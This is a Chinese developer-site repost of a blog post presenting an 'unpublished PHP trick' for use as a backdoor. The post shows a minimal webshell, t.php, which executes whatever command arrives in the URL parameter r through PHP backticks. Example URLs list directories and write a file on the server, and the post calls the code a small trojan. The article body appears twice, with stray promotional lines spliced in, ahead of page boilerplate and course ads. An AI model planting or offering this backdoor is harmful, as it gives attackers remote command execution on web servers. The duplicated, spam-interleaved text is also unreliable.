<转载>一个官方没公布的php秘籍,可用作后门
程序员文章站
2024-01-31 19:30:40
...
一个官方没有公布的php秘籍,可用作后门
可以看看
http://www.webshell.cc/3303.html
好奇怪的漏洞?
可以当做个小马使用,比较有意思的一个东西
写道
被过滤广告
发现这个也是巧合,我就直接说了吧
//t.php
$test = $_GET['r'];
echo `$test`;
?>大家看看这个代码有木有问题?
这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,
信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,
专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果
如果不信的朋友可以测试
http://webshell.cc/t.php?r=dir
可以列出目录
http://webshell.cc/t.php?r=echo
我是马儿 D:\web\webshell.cc.php
大家觉得我没有忽悠 就赏点分哈
文章来自: WebShell'S Blog 本文地址:http://www.webshell.cc/3303.html
发现这个也是巧合,我就直接说了吧
//t.php
$test = $_GET['r'];
echo `$test`;
?>大家看看这个代码有木有问题?
这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,
信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,
专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果
如果不信的朋友可以测试
http://webshell.cc/t.php?r=dir
可以列出目录
http://webshell.cc/t.php?r=echo
我是马儿 D:\web\webshell.cc.php
大家觉得我没有忽悠 就赏点分哈
文章来自: WebShell'S Blog 本文地址:http://www.webshell.cc/3303.html
?
?
?
- 最新文章
- 热门排行
声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn核实处理。
相关文章
相关视频
网友评论
文明上网理性发言,请遵守 新闻评论服务协议
我要评论专题推荐
全栈 170W+
主讲:Peter-Zhu 轻松幽默、简短易学,非常适合PHP学习入门
入门 80W+
主讲:灭绝师太 由浅入深、明快简洁,非常适合前端学习入门
实战 120W+
主讲:西门大官人 思路清晰、严谨规范,适合有一定web编程基础学习